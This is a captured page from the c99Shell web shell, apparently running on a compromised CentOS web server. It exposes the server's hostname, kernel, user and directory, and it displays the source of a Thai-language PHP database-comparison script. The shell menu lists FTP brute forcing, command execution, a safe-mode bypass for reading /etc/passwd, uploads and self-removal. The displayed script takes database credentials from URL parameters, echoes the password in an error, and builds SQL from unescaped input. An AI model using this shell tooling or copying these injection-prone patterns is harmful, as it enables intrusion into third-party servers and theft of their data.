!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/xmigratex/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cmp_detail.php (9.94 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style.css" />
<?php
include_once "special_fld.php";
include_once 
"cmp_func_pbri.php";
include_once 
"arr_all_reg.php";

$oDB=$_GET['oDB'];
$otb_name=$_GET['otb_name'];
$moDB=$_GET['moDB'];
$motb_name=$_GET['motb_name'];
$cases=$_GET['cases'];
/*
echo '$oDB '.$oDB.'<br />';
echo '$otb_name '.$otb_name.'<br />';
echo '$moDB '.$moDB.'<br />';
echo '$motb_name '.$motb_name.'<br />';
echo '$cases '.$cases.'<br />';
*/
    
$localhost_s $_GET["h"];
    
$localhost_u $_GET["u"];
    
$localhost_p $_GET["p"];
//echo 'localhost_p : '.$localhost_p;
$ln_reg mysql_connect($localhost_s$localhost_u$localhost_ptrue);
if (!
$ln_reg) {
    echo 
"<font color='#FF0000'> ";
    die(
' Could not connect: ' mysql_error()."$localhost_s, $localhost_u, $localhost_p");
    echo 
"</font >";
}else{
    
//echo "Connected $source_s successfully<br>";
}
$db_reg mysql_select_db($oDB$ln_reg);
mysql_query("SET NAMES UTF8"$ln_reg);
mysql_query("SET character_set_results=utf8"$ln_reg);
mysql_query("SET character_set_client=utf8"$ln_reg);
if (!
$db_reg) {
    die (
"Can\'t use $oDB : " mysql_error());
}else{
    
//echo "เชื่องต่อ $oDB สำเร็จ<br>";
}

$query getQryPbriChkData($oDB,$otb_name,$moDB,$motb_name,$cases);
if(
$query!=''){
    
$result mysql_query($query$ln_reg);
    
$num_case1 mysql_num_rows($result);
}else{
    
$num_case1 0;
}

$header_case = array('1' =>' ข้อมูลพื้นฐานของสบช.ที่วิทยาลัยยังไม่อัพเดต ',
'2' => ' ข้อมูลระบบทะเบียนที่มีมากกว่าข้อมูลพื้นฐานของสบช. ',
'3' => ' ข้อมูลที่PKตรงกันแต่ข้อมูลภายในไม่เท่ากัน ');

?>
<table class='tb_1'  width='100%'>
<tr><th class='h2'><?php
echo "<br />รายละเอียด $header_case[$cases] <br />";
echo 
"ตาราง $oDB.$otb_name เทียบตาราง $moDB.$motb_name<br />";
echo 
"ข้อมูลที่แตกต่างทั้งหมด  $num_case1 แถว<br /><br />";
?></th></tr>
<tr><td class='h2'> ให้นำสคริปไป execute ทาง phpMyAdmin</td></tr>
<?php
for($index=0;$index<=count($sm);$index++){
    if(
$sm[$index]['old']['name'] == $otb_name){


        
$ofld $sm[$index]['old']['fld'];
        
$mofld $sm[$index]['new']['fld'];
        if(
$cases==2){
            
$insert " INSERT INTO $moDB.$motb_name (";
            
$select " SELECT ";
            for(
$fld=0;$fld<count($mofld);$fld++){
                if(
$ofld[$fld]=='-' || $mofld[$fld]=='-'){
                    
$insert.=''$select.='';
                }else{
                    if(
$fld!=0){
                        
$insert.=', ';
                        
$select.=', ';
                    }
                    
$insert.='`'.$mofld[$fld].'`';
                    
$select.='`'.$ofld[$fld].'`';
                }
            }
            
$insert.=' )';
            
$select.=" FROM $oDB.$otb_name ";

        }elseif(
$cases==3){
            
$update " UPDATE $moDB.$motb_name ";
            
/*            for($fld=0;$fld<count($mofld);$fld++){
                if($ofld[$fld]!='-' || $mofld[$fld]!='-'){
                    if($fld!=0){
                        $set.=', ';
                    }
                    $set.='`'.$mofld[$fld].'`';
                }
            }
            $set.=' ) = ( ';*/
        
}

        
$num_row 1;
        while (
$row mysql_fetch_assoc($result)) {
?>
            <tr><td><font color="#4400ff" size="2"><b><?php
            
echo 'แถวที่ '.$num_row;
            
?></font></td></tr>

            <tr><td>
                <table class='tb_1' width=''>
                <tr><th colspan='2' align="center" >
                    <?php echo "&nbsp;&nbsp;&nbsp;ฐานข้อมูลเก่า&nbsp;&nbsp;".$oDB.'.'.$otb_name."&nbsp;&nbsp;&nbsp;"?></th>
                <th colspan='2' align="center" >
                    <?php echo "&nbsp;&nbsp;&nbsp;ฐานข้อมูลใหม่&nbsp;&nbsp;".$moDB.'.'.$motb_name."&nbsp;&nbsp;&nbsp;"?></th>

<?php

            $where
=' WHERE ';
            
$set ' SET ';
            
$set_cmp ' SET ';
            
$set_num 0;
            for(
$fld=0;$fld<count($ofld);$fld++){
// ----------- gen query ---
                
if($cases==2){
                    
// insert
                    
if($ofld[$fld]=='-' || $mofld[$fld]=='-'){
                        
$where.='';
                    }else{
                        if(
$fld!=0){
                            
$where.=' AND ';
                        }
                        
$where.= '`'.$ofld[$fld]."` = '".$row[$sm[$index]['old']['fld'][$fld]]."' ";
                    }
                }elseif(
$cases==3){
                    
// update
                    
if($ofld[$fld]=='-' || $mofld[$fld]=='-'){
                        
$set.=''$where.='';
                    }else{
                        
$strcmp strcmp ($row[$sm[$index]['old']['fld'][$fld]], $row[$sm[$index]['new']['fld'][$fld]] );
                        if(
$fld!=){
                            
$where.=' AND ';
                            
$set_cmp.=' , ';
                        }
                        if(
$set_num!=&& $strcmp!= 0){
                            
$set.=' , ';
                        }

                        if(
$strcmp!= 0){
                            
$set.= '`'.$mofld[$fld]."` = '".$row[$sm[$index]['old']['fld'][$fld]]."' ";
                            
$set_num++;
                            
                        }
                        
//$set_cmp.=$moDB.'.'.$motb_name.'.`'.$mofld[$fld].'`='.$oDB.'.'.$otb_name.'.`'.$ofld[$fld].'`';
                        
$set_cmp.=$motb_name.'.`'.$mofld[$fld].'`= `'.$otb_name.'`.`'.$ofld[$fld].'`';
                        
$where.= ' `'.$mofld[$fld]."` = '".$row[$sm[$index]['new']['fld'][$fld]]."'";
                    }
                }
// ----------- end gen query ---
                
if($sm[$index]['old']['fld'][$fld] == '-' || $sm[$index]['new']['fld'][$fld] == '-'){
                    
$style_font '';
                }else{
                    
$strcmp strcmp ($row[$sm[$index]['old']['fld'][$fld]], $row[$sm[$index]['new']['fld'][$fld]] );
                    
$style_font = ($strcmp != 0)?'style="color: #FF0000";':'';
                    
                }
?>

                <tr>
                    <td class='h2'>
                    <?php echo $sm[$index]['old']['fld'][$fld]; ?>
                    </td>
                    <td <? echo $style_font;?>>
                    <?php echo ($sm[$index]['old']['fld'][$fld]=='-')?'&nbsp;':$row[$sm[$index]['old']['fld'][$fld]]; ?></td>
                    <td class='h2'><?php echo $sm[$index]['new']['fld'][$fld];
                    
?></td>
                    <td <? echo $style_font;?>><?php //echo ($row[$sm[$index]['new']['fld'][$fld]]=='-')?'&nbsp;':$row[$sm[$index]['new']['fld'][$fld]];
                    
echo ($sm[$index]['new']['fld'][$fld]=='-')?'&nbsp;':$row[$sm[$index]['new']['fld'][$fld]];
                    
?></td>
                </tr>

<?php
            
}
?>
                </table>
            </td></tr>
        <tr><td class='h2'>Query : <?php
            
if($cases==1){
                echo 
"ข้อมูลที่วิทยาลัยยังไม่ปรับปรุงได้จัดเก็บลงในฐานข้อมูลใหม่แล้ว";
            }elseif(
$cases==2){
                echo 
"เพิ่มข้อมูลแถวที่แสดงลงในฐานข้อมูลใหม่";
            }elseif(
$cases==3){
                echo 
"ปรับปรุงฐานข้อมูลใหม่ โดยใช้ข้อมูลของวิทยาลัย";
            }
        
?></td></tr>
<? if($cases!=1){ ?>
        <tr><td><?php 
            
if($cases==2){
                echo 
"$insert<br />$select<br />$where"
            }elseif(
$cases==3){
                echo 
"$update<br />$set<br />$where ;"
            }
        
?></td></tr>
<? ?>
        <tr><td>&nbsp;</td></tr>
<?php     $num_row++;
        } 
        
$index=count($sm);
    }
}
if(
$num_case1>&& $cases!=1){
    if(
$cases==1){
        
$comment =  "ข้อมูลที่วิทยาลัยยังไม่ปรับปรุงได้จัดเก็บลงในฐานข้อมูลใหม่แล้ว";
    }elseif(
$cases==2){
        
$comment =  "เพิ่มข้อมูลทั้งหมดที่วิทยาลัยมีมากกว่าข้อมูลพื้นฐานลงในฐานข้อมูลใหม่";
        
$wh substr($select,0,strpos($select'FROM'));
        
$from substr($query,strpos($query'FROM'));
    }elseif(
$cases==3){
        
$comment =  "ปรับปรุงฐานข้อมูลใหม่ โดยใช้ข้อมูลของวิทยาลัย";
        
$strpos_inner strpos($query'INNER');
        
$strpos_where strpos($query'WHERE');
        
$inner substr($query,$strpos_inner,$strpos_where-$strpos_inner);
        
$where substr($query,$strpos_where);
    }
?>
<tr><td><font color="#4400ff" size="2"><b><?php
    
echo 'ทั้งหมด '.$num_case1.' แถว';
?></font></td></tr>
<tr><td class='h2'>Query : <?php echo $comment ;?></td></tr>
<tr><td><? 
            
if($cases==2){
                echo  
"$insert<br />$wh<br />$from";  
            }elseif(
$cases==3){
                echo 
"$update<br />$inner<br /> $set_cmp<br />$where;"
            }
?></td></tr>
<?
 
}
?>
<tr><td>&nbsp;</td></tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0144 ]--